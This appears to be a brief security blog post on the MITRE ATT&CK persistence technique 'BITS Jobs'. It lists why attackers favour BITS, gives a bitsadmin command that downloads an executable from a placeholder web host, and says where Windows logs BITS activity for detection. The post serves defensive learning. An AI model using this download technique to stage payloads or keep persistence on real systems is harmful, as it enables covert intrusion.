MITRE ATT&CK (Persistence): BITS Jobs

goay xuan hui
1 min readMar 4, 2021

What is BITS?

Background Intelligent Transfer Service (BITS) is a technology developed by Microsoft to manage file uploads and downloads, to and from HTTP servers and SMB shares.

Benefits of BITS

  • BITS tasks are self-contained in the BITS job database, without new files or registry modification.
  • Creation of long standing jobs are supported with the default maximum lifetime of 90 days and can be extendable.
  • BITS tasks are often permitted by the host firewalls.
  • BITS tasks are also able to resume transfer after a network outage or reboot.

How to run BITS jobs?

cmd.exe /c bitsadmin /transfer JOBNAME /download /priority high http://downloadwebsite/file.exe c:\downloadfile.exe

When bitsadmin.exe is spawned, it will create the transfer job, assign it to svchost.exe and exit the process. svchost.exe is a process that managed network services. So, you will see the below process being run:

c:\windows\system32\svchost.exe -k netsvcs -p -s bits

How to detect BITS jobs?

This makes BITS a useful tool for the adversaries to maintain persistence and execute malicious codes. We can detect BITS specific artifacts under:

Microsoft Windows event log: “Microsoft-Windows-Bits-Client Operational.evtx”

Folder Location: “C:\Windows\System32\Winevt\Logs”;

References:

https://www.sans.org/reading-room/whitepapers/forensics/bits-forensics-39195

https://attack.mitre.org/techniques/T1197/

--

--

goay xuan hui

A food lover, a cyber security enthusiast, a musician and a traveller, so you will see a mix of different contents in my blog. ☺️